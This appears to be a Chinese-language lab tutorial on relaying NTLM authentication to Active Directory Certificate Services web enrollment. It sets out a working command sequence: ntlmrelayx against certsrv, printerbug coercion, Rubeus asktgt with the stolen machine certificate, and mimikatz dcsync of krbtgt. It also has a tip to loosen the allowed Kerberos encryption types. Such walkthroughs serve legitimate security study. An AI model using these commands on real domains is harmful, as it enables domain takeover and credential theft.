【域渗透】AD CS relay attack

一、漏洞简单介绍：

adcs支持几种基于HTTP的通过管理员可以安装的其他AD CS服务器角色功能。这些基于http的证书注册接口都是易受攻击的NTLM中继攻击，因为没有启用NTLM中继保护，而且Authorization HTTP 标头明确只允许通过 NTLM 身份验证，因此更安全的协议（如 Kerberos）无法使用。

二、环境部署及介绍

（不一定需要辅dc，任意域内机器安装adcs即可）

角色	IP	系统信息
攻击机	192.168.237.131	Kali
DC主机	192.168.237.22	win2012R2
辅DC	192.168.237.24	win2012R2

 

 

 

 

 

PS：不能relay自身否则脚本会报错

在dc辅控上装上adcs（这里我主dc也装了），勾选1，4默认安装即可

同时看一下dc和dc辅控是否在domain computers组里面，不在就自己加入即可，否则会利用失败

  

三、漏洞利用

域内定位ca机器：certutil -config - -ping

安装impacket旧版本没有adcs命令：https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack

攻击机器开启监听：python3 ntlmrelayx.py  -t http://192.168.237.22/certsrv/certfnsh.asp -smb2support --adcs

利用任意的触发机器账号认证，使辅域进行强连回来，这里使用的是打印机服务：python printerbug.py domain/user:password@192.168.237.22 192.168.237.131

ntlmrelayx成功进行relay，并获取到证书信息

利用上面获取到的证书，获取tgt并注入：

Rubeus.exe asktgt /user:DC$ /certificate:MIIRFQIBAzCCEN8G /ppt

出现了如何下报错：KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

这里解决打开组策略，计算机配置\Windows 设置\安全设置\本地策略\安全选项，找到配置 Kerberos 允许的加密类型，将下面全部勾选即可

 

再次重新测试发现成功获取到了TGT

 然后利用mimikatz，进行导出hash：KERBEROS::List lsadump::dcsync /user:krbtgt

 

补充：获取TGT的时候遇到的是KRB-ERROR (62) : KDC_ERR_CLIENT_NOT_TRUSTED这种报错，有可能是时间不同步的原因，可重启环境重新测试。

 

参考链接：

https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

https://mp.weixin.qq.com/s/wW94EiPiOmJsWeFR64Dg1A